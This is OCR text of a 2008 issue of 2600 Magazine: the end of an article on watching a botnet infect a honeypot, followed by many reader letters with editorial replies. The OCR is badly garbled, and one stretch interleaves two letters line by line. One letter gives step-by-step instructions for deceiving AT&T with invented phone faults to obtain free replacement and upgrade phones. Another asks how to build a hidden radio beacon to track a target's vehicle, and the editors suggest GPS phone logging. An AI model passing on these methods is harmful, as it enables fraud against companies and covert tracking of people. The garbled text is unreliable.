I RC i s that the protocol requi res messages to
be broadcast to everyone i n a channel . Much
l i ke Ethernet, the i ndi vi dual computer or bot
determi nes whi ch messages are i ntended for it
and i gnores a l l others. I t is therefore extremel y
easy to sni ff traffi c goi ng to any other i ndi vi dual
person or bot, even when usi ng t he "pri vate"
message command. In thi s way, i t becomes
poss i bl e to catch the many di fferent commands
used to control the bots, as wel l as any chat text
whi ch the hacker mi ght conduct among fri ends
i n the bot channel s. Thi s i s an extremel y i nter
est i ng gl i mpse i nto the bot herder cul ture.
The i nstance of botware i nfecti ng the
honeypot i n thi s case was not for sendi ng
ema i l spam, and it di d not noti ceabl y di mi ni sh
performance. From the l ogs, i t was apparent
that TardBot was scanni ng, but that i t was doi ng
so at a throttl ed pace so as to prevent detec
t i on. Dur i ng the approxi matel y four days that
TardBot was l eft runni ng, the i nstance on the
honeypot was used vari ousl y for FTP storage,
scanni ng and DDoSi ng I RC and web servers.
Be aware that the i nfecti on you capture may
be enti rel y di fferent i n form, functi on, and l evel
of sophi sti cati on. Some cutt i ng-edge bots use
encrypti on schemes to hi de the traffi c used
to control them and are enti rel y custom-bui l t
by experi enced programmers. Most of these
advanced hackers are maki ng money through
thei r bot nets, rather than to fl oodi ng websi tes
or other I RC servers. Di ssect i ng these bots i s
an al together more compl ex and entertai ni ng
experi ence.
That ' s a l l . I hope you ' ve managed to l earn at
l east somethi ng. I f not, I hope you were at l east
entertai ned for a few mi nutes.
Shouts t o bee, shea and his crew arik, the
culprit, everybody from K and MUM and thl
wet blanket from flavor co. Also, I' m adding the
following resource for Americans, which is a
compilation of different states ' computer laws:
h t tp : / / www . nc s l . org/ programs / l i s / C I P /
-hackl aw . htm
Summer 2008
Pa
g
e 33
Suggestions
Dear 2600:
Hey j ust sayi ng a whi l e ago I read a letter here
sayi ng if your mouse is j i ttery that you're bei ng
watched. Wel l , j ust to put my two cents out there,
there is a program that l ets you bl ock your IP from
everyone. It's cal l ed Peer Guardi an. I f you acti vat

i t,
your mouse wi l l stop j i tteri ng and you're not bemg
watched anymore. I t al so hel ps when pi rati ng stuff.
Nsane HAcker
It' so nice of the watchers to make it this easy
to detect their presence. Te piracy world must be
breathing one huge sigh of relief.
Dear 2600:
ti me though. Keep i n mi nd the soci al engi neer i ng
ski l l s t hat Thomps expl ai ned i n hi s arti cl e. The tri cky
part about thi s is getti ng them to bel i eve there is a
probl em that can onl y be sol ved by sendi ng a new
phone and then maki ng them bel i eve the onl y way
you' l l remai n happy is wi th a better phone. J ust be
creative and have a pl an for everythi ng.
Greg
Tis is living proof that lying and being a royal
pain in the ass is the true secret to success. If you
could keep going at this rate, it wouldn't be long be
fore you owned the company outright. This is a true
American success story that serves as an inspiration
to us all.
Inquiries
After readi ng the arti cl e "Gami ng AT&T Mobi l -
Dear 2600:
i ty" by The
Thomps in the Spri ng 20

8 i ssue,

ave
I have a few questi ons and requests for advi ce
somet hi ng to add that was not menti oned. Thi s mfo
from the phone phreaks, the net savvy, and the en-
comes from personal experi ence as a customer.
gi neers among us. Is there such thi ng as a
p
repai d
Whi l e Thomps had a secti on of hi s arti cl e ti tl ed
cel l phone servi ce that has GPS (or other tnangul a-
"Free Phones" he onl y tal ked about getti ng di scounts
ti on) features for real -ti me tracki ng? Woul d usi ng an
(whi ch I mi ght add was qui te i ngeni ous), not getti ng
anonymi zer websi te whi l e tracki ng i t over the net be
a phone for free. I t i s possi bl e to obtai n phones from
suffi ci ent to dust a trai l of the IP address of the "desk-
them for free.
top" porti on of the survei l l ance?
You don't even have to be el i gi bl e for an up
-
I
'
m al so seeki ng
advi ce on a project I envi si on
grade or buy addi ti onal accessori es to do thi s. Al l
compl eti ng: an economi cal way t o modi fy a com-
you need i s a phone that i s sti l l under warranty wi th
mon GMRS or FRS radi o to functi on wi th a control
AT&T. They gi ve you a one year warranty when you
uni t that woul d transmi t a si gnal wi th a 1 kHz tone
buy a phone from them. A l ot of peopl e don't even
at, for exampl e, ten second i nterval s whi l e a vehi cl e
real i ze they have thi s warranty. So let's say you own
i s stopped, and at three second i nterval s once move-
an HTC 8525 . You want the li l t, don't you . . . . I t has
ment of the vehi cl e i s detected. A combi nati on of
GPS, you know you want i t. What you do i s cal l i n
a pi ezoel ectri c swi tch on a mi croprocessor whi ch
and tel l them you have a probl em wi th your phone.
woul d control the radi o comes to my mi nd. I have
Make a probl em up; i t has to be somethi ng unre-
pl enty of experi ence at troubl eshooti ng, repai ri ng,
l ated to the battery and can't seem l i ke i t woul d be
and bui l di ng el ectroni cs contrapti ons but next to
consi dered abuse or other damage that woul d voi d
none engi neeri ng them as i s t he nature of thi s proj -
your warranty. For i nstance, tel l them the recepti on
ect. The pri ces of ones I 've shopped for commerci al l y
seems t o be degraded from when you fi rst purchased
have been somewhere between absurd and astro-
the phone, or maybe the phone freezes al l the ti me
nomi cal . And a huge percentage of that i nvestment
or buttons i ntermi ttentl y work. They wi l l gl adl y try to
goes i nto a ri ver or gets beat wi th a sl edgehammer i f
sol ve the probl em for you, but of course you wi l l tel l
the transmi tter gets di scovered. I ' m al so consi der i ng
t hem none of t he sol uti ons worked. They wi l l end
changi ng t he radi o's crystal so as t o avoi d t he si gnal
up shi ppi ng you another phone. After you get the
getti ng "wal ked over" by anyone transmi tti ng near-
phone, cal l them up agai n. Tel l them this one has the
by on the same frequency, i ntercepted by curi ous
same probl em, or another probl em of your choi ce.
scanni ng enthusi asts, etc. As of now, my RF scan-
You want them to send you another phone.
ner woul d be used as the receiver, but eventual l y I
You wi l l do t hi s a total of three ti mes, then on
pl an to progress to a recei ver wi th an anal og meter
your fi nal cal l you wi l l tel l them that you have had
movement and h i ghl y sensi tive gai n control . Perhaps
enough, repl aci ng these 8525s i sn't getti ng anywhere
the thi rd stage of thi s progressi on wi l l be to bui l d
- you want a di fferent phone. The next cl osest phone
my own tri angul ati on receiver. Anyway, even i n i ts
is the li l t, so that is what you can get out of them. I
most basi c form, thi s "bumper beacon" wi l l gi ve me
have done t hi s twi ce, worked perfectl y both ti mes.
the abi l i ty to more qui ckl y fi nd, then narrow down
The onl y drawback wi th thi s method i s that you can
the l ocati on of the parked target vehi cl e (provi ded of
onl y get a s i mi l ar phone to what you have currentl y.
course that it is wi thi n range of suspected l ocati ons) .
You coul d work your way up to the best phone over
I wi l l greatl y appreci ate feedback and advi ce on how
Pa
g
e 34 2600 Ma
g
azine
I can desi gn and accompl i sh thi s l i ttl e project.
J ust in case you're wonderi ng about my moti ves,
I ' m a professi onal "peopl e watcher" i . e. , a Pri vate I n
vesti gator, provi di ng needed servi ces for good peopl e
bei ng done wrong by others i n matters of ci vi l l aw.
The PI message boards and emai l groups woul d go
ape-dung if such questi ons as the ones above were
posted there. Pl us the desi gn questi ons woul d l i kel y
be too techn i cal for al l but a few of them.
Carl
The only prepaid service we're aware of with
full-blown GPS is Boost Mobile' iDEN product (they
market both iDEN and COMA products, and only
the iOEN product includes a precise GPS receiver).
You could, in theory write an application to log the
location periodically and post it to a website using
the data connectivity package.
Sprint also sells something called Sprint Family
Locator. See https:llsfl. sprintpcs. comlfinder-sprint
-familylsignln. htm for details. This will provide the
approximate location of your target. However, it is
not available as a prepaid service.
Dear 2600:
Are you guys sti l l accepti ng photos of payphones
for your websi te? There are many i nteresti ng pay
phones in Tai wan now, but they have evol ved i nto
somethi ng more l i ke ki osk computers wi th touch
screens. I can send some photos to you i f you woul d
l i ke t o see them.
Tommy
By all means send them in. The address is
payphones@2600. com. Be sure to use the highest
quality settings on your camera as low settings don't
print well in the magazine.
Dear 2600:
Fi rst off, I real l y appreci ate the hard work you
guys put i nto produci ng such a great publ i cati on.
I t' s changed my percepti on of technol ogy greatl y. A
fri end and I have been i nspi red to start a 2600 meet
i ng in our l ocal area ( Bel fast, Northern I rel and) and
we were wonderi ng i f there i s any part i cul ar format
that these meeti ngs need to have?
redtape
It' all pretty straightforward. The meetings
need to be open to all in a public area with no
admission charge, age restriction, or anything
like that. There' a more detailed set of guidelines
on our website at www. 2600. comlmeetings. lt.
also important to keep us updated by emailing
meetings@2600. com so we know you're continuing
to run the meetings. Good luck!
Dear 2600:
Is there any part i cul ar reason you repl i ed to me
wi th a gi ganti c emai l of stuff I di dn't need to know?
Do you get many questi ons to meeti ngs@2600. com?
Because as I must contact you about the meeti ngs i n
Tul sa, I ' m not exactl y served by thi s.
Di d I do somethi ng wrong?
Joseph
You didn't do anything wrong but that ' the way
the system operates. Most people who email that ad
dress are looking for information on the meetings so
we have our robot automatically send a full list back
plus the set of meeting guidelines. Some people enter
into a dialogue with what they assume is a really fast
typing human. But you only get that big mail the first
time you send email to the address (and after a cer
tain number of weeks beyond that) . The alterative
to this system would be to have yet another email
address for those people reporting on meetings. That
would lead t o a lot more work and traffic than simply
deleting that one piece of mail we send.
Dear 2600:
I am tryi ng to expand the l i nks page on my web
si te www.bayareaki cks. com. and I woul d l i ke to add
your websi te (www. 2600. com/phones) to that l i st.
Some websi tes do not l i ke when others l i nk to them,
so I woul d l i ke to recei ve permi ssi on from you fi rst.
The thousands of dai l y vi ewers that read my
websi te are I nternet savvy and are al ways l ooki ng for
new websi tes to vi si t. I fi gured you woul dn't mi nd if
I l i nk to your si te si nce i t woul d gi ve you sl i ghtl y i n
creased traffi c. Does t hi s sound OK t o you? Are you
abl e to l i nk to my websi te? I l ook forward to your
repl y.
Mike
We don't do links ourselves but we certainly don't
mind anyone linking to us however they please. And
even if we did mind, we don't believe we would have
any right to object. It' amazing that so many people
live by rules that basically make no sense.
Dear 2600:
I wri te fol l owi ng fi ndi ng your si te on the web af
ter many years of bei ng very busy wi th an IT career
and maki ng stupi d mi stakes such as getti ng i nvol ved
wi th rel ati onshi ps. I became aware of 2600 many
years ago but never real l y got i nto practi cal thi ngs. I
noti ced that there is a meeti ng in Gl asgow, Scotl and.
Can you gi ve me any more i nformati on regardi ng
t hi s or i ndeed i f i t sti l l happens. I l ook forward to
your response.
Liam/M/37
The only way to know if it' still happening is
to go there and see. Even if nobody else shows up,
there' nothing stopping you from breathing new life
into it. But we appreciate being told if the meetings
die out so we don't have to squish so many of them
onto page 66. Lately it seems as if everyone is com
plaining about the tiny type.
Dear 2600:
2600 is the best magazi ne ever, but the ti ny type
is ki l l i ng me as my eyes are gett i ng worse and worse
every year. Have you ever thought of havi ng an emai l
versi on of the magazi ne that peopl e coul d subscri be
to? I woul d l ove to get my 2600s as a PDF, DOC, or
maybe j ust a pl ai n ol d text fi l e. One thi ng i t woul d
save i s me havi ng t o type i n t he programs. I coul d
j ust copy and paste i nstead. I n t he meanti me, keep
up the great work and I ' l l j ust buy a more powerful
magni fyi ng gl ass.
SAR
We now put all of the code up on our website
so you don't have to retype any of it. Were always
looking for new and innovative ways of doing things.
The latest is our 900 page book of some of our best
articles which is just hitting the shelves with much
larger type.
Summer 200B Pg
e
3
5
Dear 2600:
How can I use the servi ces of a hacker?
etsjobs
Whereas most religions require you to pray or do
some sort of penance in order to obtain the goods
and services you desire, with hackers you have but to
ask and pay our nominal fee. Obtain any password,
change any grade, even travel back in time when
necessary! Your wish (plus the fee) is our command.
Now go tell all your friends.
Dear 2600:
I woul d l i ke to get your new book cal l ed The Best
of 2600: A Hacker Odyssey when your book comes
out in J ul y 2008. Where can I buy your new book?
And what does your new book cover? Can you send
me some pri ntout of the Tabl e of Contents of your
book cal l ed The Best of 2600: A Hacker Odyssey?
And what wi l l your new book cost? Al so, can we buy
thi s book from you? Woul d you pl ease send me any
i nfo you have about your new book? I wi l l be l ook
i ng forward to hear i ng from you. And to getti ng your
new book.
John
We believe you're referring to our new book. It'
available everywhere, both online and in bookstores.
It retails for $39. 99 and covers the three decades that
2600 has been around. We don't sell i t ourselves as
i t ' sold directly through the publisher (Wiley) . We're
real happy we could finally pull this off and get so
much of the historical material we've published since
1 984 out into the mainstream. Let's hope it does well
so we can do more fun projects like this.
Dear 2600:
Urgent! I need a new i denti ty for me and my
daughter because we are vi cti ms of abuse i l l egal l y.
Send me i nformati on pl ease.
Eva
00 you really believe that emailing total strang
ers is the best way to start a new life? We're not the
witness relocation people but even if we were, it'
not the kind of thing you do casually You can find a
whole lot of tips on the net about how to hide and/
or protect your privacy. Advertising your problems to
anyone who will listen is probably the first item on
the list of things not to do.
Dear 2600:
I have thi s stupi d "ShopAtHome Sel ectRebates"
th i ngi e in my tool bar that refuses to be del eted. How
do I get rid of the program In Toto? I mean, I went
i nto the "Program Fi l es" and del eted al l that I coul d,
but there were some thi ngs that refused to be de
l eted. What gi ves?
Z
You need a decent malware/adware/general crap
removal program that isn't worse than the stuff it'
supposed to be getting rid of. We're not going to rec
ommend one over another because it'll just start end
less bickering that none of us will live to see the end
of. Look at the platform you have and find some pro
grams that will run in your environment, then look
for user reviews of their performance before actually
installing them. And in the future, be careful of what
you download or open on your system as this is how
Dear 2600:
I found your j ournal in a Borders, bought it
qui ckl y, and was pl easantl y surpri sed. I t's provi ded a
useful resource to the di gi tal i mage research I do that
I 'd prefer not to say anythi ng el se about. I do have
a questi on for you and your 2600 readers: I s there
a method for fi ndi ng and restori ng metadata that's
been purposel y erased from di gi tal i mages? Thi s i n
formati on coul d be qui te, qui te useful . Keep up the
good work.
Haestar
This sounds like material for a really informative
article if someone out there has done the research.
Dear 2600:
I have put together an arti cl e that I woul d l i ke to
submi t to 2600 for your consi derati on. Do you have
an edi tori al cal endar and gui del i nes avai l abl e or can
I j ust submi t the arti cl e? Can I i ncl ude exhi bi ts? Do
you prefer a Word document or PDF fi l es? Pl ease l et
me know.
R
just send us what you've got. We can read most
anything but to be safe always send along a plain
ASCII text fle. The email address is articles@2600.
com.
Dear 2600:
l et me in . . . so what do i have to do to get i n? i m
tradi ng code t o t hi s guy for ni ce computers. usenet
woul d ni ce. it woul d be ni ce. im goi ng to have a
mi ndset wi th nuemoni c reach and a storage parti
ti on of a 1 00 gb wi th terrar process. but i dont have
any other
Phobus
No, you certainly don't.
Dear 2600:
Do you fol ks accept press rel eases? We recentl y
announced a new software product that we thi nk i s
real l y ti mel y: an easy t o use drive mi grati on uti l i ty.
Can we send you our press rel ease or a copy of the
software to revi ew?
Woul d much appreci ate a repl y.
Donna
We accept all kinds of crap from people and we
suspect a bunch of press releases would fit that def
nition. But we' rather not have to wade through a
pile of public relations nonsense in order to get to
the words of our readers, which is what the email ad
dress (/etters@2600. com) you contacted is set up for.
Oh yes, and we also don't send out personal replies.
But you knew that.
Dear 2600:
Best greets from Austri a. It's real l y hard to get a
copy of 2600 here, but congratul ati ons to your great
magazi ne.
A fri end of mi ne and I have wri tten an arti cl e
about t he basi cs of t he l ockpi cki ng sport. The arti cl e
contai ns an i ntroducti on to the sport i n general , a
short expl anati on of the l i nk between hacki ng and
l ockpi cki ng and the basi c techni ques l i ke pi cki ng and
bumpi ng. I mpressi oni ng i s not covered i n the arti cl e.
Are you i nterested i n t hi s ki nd of arti cl e? Do you
al so shi p magazi nes to Austri a? Do you have a part
ner here?
such garbJ e gets there in the first place.
Tom
pg
e
6 2600 Ma
g
azine
We have many partners in crime in Austria, but so
far no partners in magazine distribution. Your best bet
is just to get a subscription and have it mailed to you
directly from us. And of course we'd be interested in
seeing your article.
Dear 2600:
Tel l me how much one of your hackers woul d
charge me t o del ete my cr i mi nal record from the
Texas pol i ce database.
[Name Deleted]
Well, we would start with erasing your latest
crime, that of soliciting a minor to commit another
crime. (Your request was read by a small child here
in the office. ) After you're all paid up on that, we will
send out the bill for hiding your identity by not print
ing your real name, which you sent us like the meat
head you apparently are. After that' all sorted, we
can assemble our team of hackers, who sit around
the office waiting for such lucrative opportunities as
this to come along, and figure out even more ways
to shake you down. It's what we do, after all. Just ask
Fox News.
Dear 2600:
I have a lot of hacki ng rel ated pi cs on my phone
and I was wonder i ng how I shoul d get them to you i n
a usabl e format si nce I do not have anyth i ng that wi l l
hook up t o my computer t o get the pi ctures off of the
phone any advi ce wou l d be very hel pfu l .
eri k
It seems odd that you have a picture phone with
no means of sharing pictures. If you can use email
on your phone, you could always email them to us.
If that doesn't work, you'' just going to have to send
us the phone. (And don 't forget the charger. )
Dear 2600:
Here I am pl owi ng through a shameful backl og
of one year's worth of 2600. Wh i l st tak i ng a break, i t
occurred to me to i nvesti gate how much I 've spent on
2600 si nce I started purchasi ng at the newsstand i n
1 995. I have a col l ecti on of about 44 i ssues wi th an
approxi mate average pri ce of $5. 65. I 've spent about
$250 on 2600 over the years. So, I ' m ki cki ng mysel f
for not consi deri ng a l i fet i me subscri pti on sooner.
Do you guys thi n k you' l l be abl e to keep on trucki ng
at l east another t en years so I coul d get more bang for
my buck upon order i ng a l i fet i me subscri pt i on?
Al so, are l i fet i me subscri pti ons transferabl e or
does i t absol utel y end wi th me? Let's say, for exam
pl e, one of my chi l dren takes a l i ki ng to your maga
zi ne and I become a pcnn i l css wi dower stri cken wi th
gl aucoma. Can my chi l d then carry the mant l e of
2600 reader of the fami l y on my $260?
Asi de: does 2600 have a game pl an i f one or
more of the cri ti cal staff i s met wi th i nj ury or death
that prevents them from worki ng on the magazi ne?
Have you tapped anyone to take over the rei ns i f the
I i fe of the magazi ne outl asts those of cr i t i cal staff
members?
I apol ogi ze for my questi ons spi ra l i ng towards
the morbi d. I 'm at that age where l i fe and death seem
to be occur r i ng i n equal quanti ti es.
Acidevil
Well, thanks for depressing the hell out of all of
us. Clearly we need to start thinking about how to
incorporate death into our business plan. We'll try
to get on it. But first we need to get through The Last
HOPE.
Lifetime subscriptions really are intended for your
(or our) lifetime. When one of those ends, the sub
scription ends. It' not meant to last for the lifetime of
the human race, as you are apparently already plot
ting to do through your future unborn generations.
If this kind of abuse prevails, we might have to cap
these subscriptions at 1 20 years or however long
people are living to these days.
We'll make every attempt to live long enough to
ensure that you get your money's worth from your
lifetime subscription. This is the solemn promise we
make to all of our readers.
Dear 2600:
I subscri bed in December of 2007 and have onl y
recei ved t he fi rst quarter mag. Has t he second quar
ter gone out yet?
chris
Yes, and you really should have gotten it. Please
let us know if you see this.
Dear 2600:
I 'd l i ke to publ i sh two arti cl es, can I meet a staff
member?
Musique Maison
Not so fast there. You don't get a personal visit
until you publish 20 articles! Nice try though.
Dear 2600:
What do you thi nk about Li feLock? Seems to me
that j ust some common sense protect i on of your per
sonal i nformat i on is enough. The adverts seem a l i tt l e
extreme, wi t h the guy shar i ng hi s SSN and a l l .
eroOcool
You're refrring to the company whose CEO goes
around advertising his Social Security number saying
that he has nothing to worry about because he uses
the service he' peddling to protect his identity. All
this tells us is that the availability of SSNs has got
ten so common that it' almost a trivial detail at this
point. W're expected to give them to the phone
company, employers, banks, schools, and virtually
anyone who asks for them. Since so many people still
don't know how to say no, a whole business based
on fear has popped up under the guise of protecting
you from exploitation. You really don't need a com
pany to do this. As you say, a little common sense
goes a long way. Keep your private information to
yourself, don't advertise anything about your private
life on the Interet that you wouldn't want Charles
Manson to know about, and keep a close eye out for
any electronic transactions that may not be yours.
Like any disease, prevention and early treatment will
go a long way.
Observations
Dear 2600:
Fi rst off I need to apol ogi ze i f my Engl i sh seems a
bi t wei rd. I speak German as my nat ive l anguage and
I am not 1 00 percent bi l i ngual . Recent l y I enj oyed a
l augh whi l e tryi ng to cal l a fri end of mi ne who l i ves
in New York ci ty. I di al ed 7 1 8-238-9901 by acci dent
(fri end's number i s actual l y a coupl e of di gi ts off) and
recei ved the recorded "stati on 1 0" for the 77th Street
Summer 2008 Pa
g
e
37
DMS- l 00. If rock and rol l fans who cal l t hi s number
t hi nk "The Ki ng" i s dead, turns out he's been worki ng
for Veri zon t hi s whol e t i me.
Anyhow, I have been readi ng 2600 for at l east
a coupl e of years now and am enj oyi ng what I am
readi ng. I rea l l y fi nd i t i nteresti ng especi al l y wi th
regard to the tel ephone arti cl es. I get a ki ck out of
cal l i ng some of the odd tel ephone numbers sent i n
occasi onal l y by readers and I even bought a Track
Phone not too l ong ago j ust for phone expl orati on
of thi s type.
Ri de tuff and al ways have your Track Phone
handy. Thankya ver' much.
fOxR4c3r
That recording has been around forever, well be
fore Verizon even existed. In the New York area, the
990 1 suffix is often used to identify the switch type
of a particular exchange. It used to be that dialing
anything in the 99xx series would hook you up to
something being run by the phone company 9970
would always get you a busy signal, 997 1 a fast busy
(reorder), 9979 a sweep tone, and 9950 oftentimes
would connect you to the business office. These days
you could easily wake up a customer in the middle
of the night if you try any of these numbers as they're
now being used as non-magical extensions.
Dear 2600:
Yesterday I was pass i ng t hrough Veni ce ai rport
and attempted to use an I nternet poi nt. Thi s I nternet
termi nal i nterested me as i t was a free standi ng ki osk
wi th the opti on to open fi l es from a pen dri ve. So I
i nserted mi ne so I coul d open my expl oi t - I mean
photos - from my pen dri ve. Next t hi ng I was be
i ng prompted that I must have my passport snapped
by the ki os k's webcam before I can access the ma
chi ne . . . somethi ng about the I ta l i an government
requi ri ng i t. Of course I di dn't offer i t anythi ng and
after a few moments the machi ne prompted for an
other photo t o be taken. So I di dn't agree t o have my
I D photographed and pushed the refund button, but
nothi ng happened. Thi s has t o be agai nst some l aw;
there was no i ndi cati on unt i l I i nserted my money
that my I D wou l d have to be recorded, and when I
di dn't agree to these terms, I was not gi ven the op
ti on of a refund. The ki osk's owners j ust made a qui ck
buck from me wi t h absol utel y no retur n. Does any
one know i f thi s i s normal practi ce or does i t happen
i n any other countri es? 2600 readers, beware of such
termi nal s .
Pdraig
We doubt such d thing would be tolerated for
very long over here, unless people were told it was
needed for homeland security or something. And
what are the odds of that? But it would be helpful to
expose the name of the company running this kiosk
and stirring up some outrage about these practices.
That ' the very definition of civic duty
Dear 2600:
J ust recentl y I 've been i ntervi ewi ng for j obs in my
area and noti ced a few t hi ngs. One i s that i t seems
l i ke a l l sen i or network engi neers l i ke to brag about
thei r networks, whi ch coul d make for an outstandi ng
soci al engi neeri ng experi ment. For exampl e, I i nter
vi ewed wi th a u ni versi ty in my area and the guy went
real l y i n depth wi th what they use and/or pl an on
usi ng. I woul d t hi nk these peopl e woul d onl y di vul ge
i nformati on that i s necessary to gai n an understand
i ng of what the appl i cant ski l l s are. The second t hi ng
i s t hat i f you are tryi ng t o get i nto an i nformati on as
surance career, good l uck. You won't even get some
one to tal k to you unl ess you have taken and passed
the C1 SSP. I don't understand how t hi s makes you any
more knowl edgeabl e. I 've worked wi th a few peopl e
who have had t hi s cert and al l they di d was cram
for i t weeks i n advance to pass. After taki ng i t, they
dumped a l l the i nformati on that they l earned. Maybe
you coul d shed some l i ght on how t hi s cert became
so popul ar.
tim
It' really not much more than the power of sug
gestion.
Dear 2600:
I ' m not sure where to submi t my take on the
cover submi ssi on (24: 4) but I hope i t gets to the ri ght
pl ace.
My take i s that the sayi ng i s "Abandon Hope al l
ye who enter here. " Whi ch i s t he i nscri pti on above
the gates of hel l . Basi cal l y, the date and the sky and
statues above the entrance are sayi ng t hi s to me.
Abandon Hope, for thi s i s the end of the Hotel Penn
syl vani a. And that thi s i s trul y the l ast ti me we wi l l
be getti ng together here. I t's t he apocal ypse for the
hotel . My cl ues came from the "make reservati ons
to attend" on page 64, and of course Googl e for the
other i nformati on.
I f I ' m wrong or on the ri ght track, pl ease l et me
know.
CJ Lorenz
We will.
Dear 2600:
I ' m wri t i ng you concern i ng my cel l phone ser
vi ce wi th T-Mobi l e. Over a year and a hal f ago I no
ti ced that I was abl e to hear the person cal l i ng before
h i tti ng the answer button. My phone is al ways on
vi brate, and I can hear the person speaki ng qui te
cl ear l y. I 've showed thi s i nterest i ng probl em to sev
eral fri ends, so I know i t i sn't in my head.
Si x months ago I bought a new phone, and be
fore bei ng abl e to purchase i t, the T-Mobi l e worker
had to mess wi th my account i nformati on on t hei r
computer. Needl ess t o say, wi thi n mi nutes of wal k i ng
out of the store I was experi enci ng the same prob
l em.
I have si nce swi tched back t o my oi d phone, and
i t no l onger happens. I don' t have a hi story of mental
i l l ness, nor do I tend to be overl y paranoi d. Obvi
ousl y i t wou l d be very easy t o experi ence a l ot of
paranoi a in t hi s si tuati on but I 've been doi ng my best
to stay grounded and l ogi cal .
I 've asked several peopl e a n d even cal l ed T
Mobi l e about t hi s i ssue. They a l l have sai d the same
thi ng: i t's not possi bl e. Surel y i t i s or otherwi se I
wou l dn't be wri t i ng t hi s l etter. I was hopi ng the
2600 staff or l oyal readers mi ght have some words of
knowl edge for me.
rmpants
This isn't the first time we've heard people swear
this has happened to them. We've also heard people
say they can hear the called party before they an
swer. In your case though, we're curious as to what
Pa
g
e 3
8
2600 Ma
g
azine
you believe the risk is to you if you can hear people
speaking before you answer their cal. Also, why ex
actly are they speaking before you pick up? We think
you should use this opportunity to run all sorts of
experiments.
Dear 2600:
I was l i steni ng a whi l e back to one of your Off
The Hook podcasts where you were di scussi ng stop
pi ng peopl e's snai l - ma i l by USPS over the I nternet
wi th no veri fi cat i on. Thought you mi ght l i ke t hi s.
I l i ve i n I rel and and recentl y I swi tched my mo
bi l e operator. I n I rel and al l the rage i s that you are
al l owed to keep your ol d phone number when you
swi tch. So thi s i s what I wanted. The l ady asked what
my oi d number was, so I tol d her. Si nce I was gett i ng
the pay-as-you-go pl an, I di d not have t o provi de my
r eal name or anythi ng, and the l ady even confi rmed
thi s for me when I asked about i t. At the end of the
process she t hanked me, and handed me the new
SI M card (whi ch cost ni ne euros and came prel oaded
wi th ten euros worth of credi t) . I asked i f that i s a l l .
S h e repl i ed that i t woul d take up t o 24 hours for the
phone number to change. ( i t actual l y took about fou r
hours. ) No veri fi cati on of a n y k i n d that I own t hi s
phone number! They even promi sed t o do al l the pa
perwork i n three mi nutes or you get 30 euros worth
of credi t. Note for North Ameri can readers: i n Eu
rope some banks offer the abi l i ty t o veri fy/approve
bank transact i ons ( l i ke purchases wi th your credi t
card, wi re transfers, etc. ) usi ng SMS/text i ng on your
mobi l e.
Si Ki ng
Dear 2600:
I j ust recei ved my new sweats hi rt . Thanks for the
very qui ck del i very. I t had the fol l owi ng effect on my
fami l y members:
1 ) wi fe - rol l ed her eyes and made some ki nd of
grunti ng sound.
2) son, age 1 2 - "Cool sweats hi rt Dad. Di d you
get me one?"
3 ) daughter, age 9 - "I s 2600 the pri ce?"
4) daughter, age 7 - "Mom farted. "
Bob
At least now we know what the grunting sound
was. Very similar conversations take place in all sorts
of households around the world when 2600 clothing
makes its entrance.
Dear 2600:
As someone who hates gett i ng ri pped off, I 've
di sabl ed text messagi ng on my AT&T account. Un
fortunatel y, t hi s means I can nei ther send nor recei ve
text messages, but fort unatel y i t al so means I ' m not
payi ng extra for somet hi ng that transmi ts an i nfi ni tes
i mal amount of data when compared to voi ce cal l s .
I found out recentl y t hat I can sti l l recei ve mul t i
medi a messages from my fri ends' phones. A message
is sent to my phone vi a AT&T whi ch di rects me to go
to a websi te to vi ew my mu l t i medi a message ( http: /
vi ewmymessage. com) . A username and a password
i s provi ded in the message to my phone, and I have
si x days to l ook at the message before it expi res. After
enteri ng the username and password, I was taken to
a page that di spl ayed the to, from, subj ect, date, and
s i ze of the message, al ong wi th my mul ti medi a mes
sage ( usua l l y an i mage) embedded i n fl ash.
I ' m pi ssed that they' l l offer me si x days to vi e
messages sent to me wi th no opti on for savi ng the
i nformati on! I ' m not too exper i enced wi th worki ng
around embedded f l ash, but I know i t can be done.
Another i nteresti ng t i dbi t, regardl ess of username
and password, after enteri ng you r i nfo a l l users are
redi rected to the fol l owi ng URL. http:/www. vi ew
mymessage. com/en/webnons ubs cr i ber/vi ewmes
sage. do. There was some i nterest i ng i nfo i n the page
source, but I was unabl e to use i t to find any i nfo
on exact l y where my i mage was ( nor to fi nd mul t i
medi a messages i ntended for ot her subscri bers) . J ust
thought I 'd share t hi s i nfo in hopes that someone out
there wi th the know-how wi l l expl ore i t more thor-
oughl y than thi s nOOb.
Nol i
Incidentally, we have a very interesting piece on
text messaging in this issue' "Telecom Informer" on
page 7 3.
Dear 2600:
After readi ng some of your most recent i ssues, I
noti ced the whi te boxes on your new spi nes (whi ch
j ust l ook awesome, for the record) and noti ced that
they seem to be formi ng l etters of some ki nd after
compar i ng the spi nes of two recent i ssues.
I t appears that they make some sort of word/
phrase when pl aced together in order, but I can onl y
extrapol ate from the 24: 4 and 24: 2 i ssues. So, what's
the "Secret Word" here? My best guess is " F UBARI F
I C" but I know that's not ri ght because I ' m more or
l ess guessi ng on the l ast three l etters.
Ji gsaw
We only got as far as four of the eight issues need
ed to make it complete (not in issue order, either) .
But two things happened that hastened the project'
demise. One was that the new binding sucked and
was causing our readers much distress. The other
was that some of our smart alecky readers had al
ready figured out the message a full year before it
was supposed to be finished. The secret word was
"Surprised?" We certainly were.
Dear 2600:
At the end of my arti cl e from 2 5 : 1 on Wi ki pedi a
i t states that the AfD on Ebony Anpu was overturned
by the "Del eti on Revi ew Admi ni strat i on Pge. " Thi s
i s i ncorrect. I cou l d not outmaneuver t he Admi n i stra
tor I cal l Jeffrey who l ocked the page so that i t coul d
never be recreated at al l wi t hout Admi ni strator sup
port (a strange acti on, to be sure) : http:/en. wi ki pedi a.
orglw/i ndex. php?ti tl e=Ebony_Anpu&acti on=edi t
As per Marti n Eberhard's excel l ent suggesti on
t o make a pl ug- i n cal l ed "Haystack" whi ch makes
search noi se, there i s currentl y a Fi refox pl ug- i n
cal l ed "Track-Me-Not" whi ch I enj oy and acts s i mi
l ar l y.
Barrett Brown
Dear 2600:
I sti l l cannot tel l whether the express i on of di s
appoi ntment over the newspaper and TV news ac
counts i n your documentary (Freedom Downtime)
is genui ne or is meant to be i roni c. I woul d have
thought that, by the mi d 90s, everyone al ready knew
that the " major" outl ets were provi di ng entertai n
ment i nstead of i nformati on.
Summer2008 g
e 39
I n case you have not r un across it al ready, I wi l l
recommend Davi d Si mon's stuff from t he March
200S i ssue of Esquire about hi s ti me at the Balti
more Sun. I t hel ps wi t h the perspecti ve. Of course,
he presented i t as entertai nment, too, so keep it i n
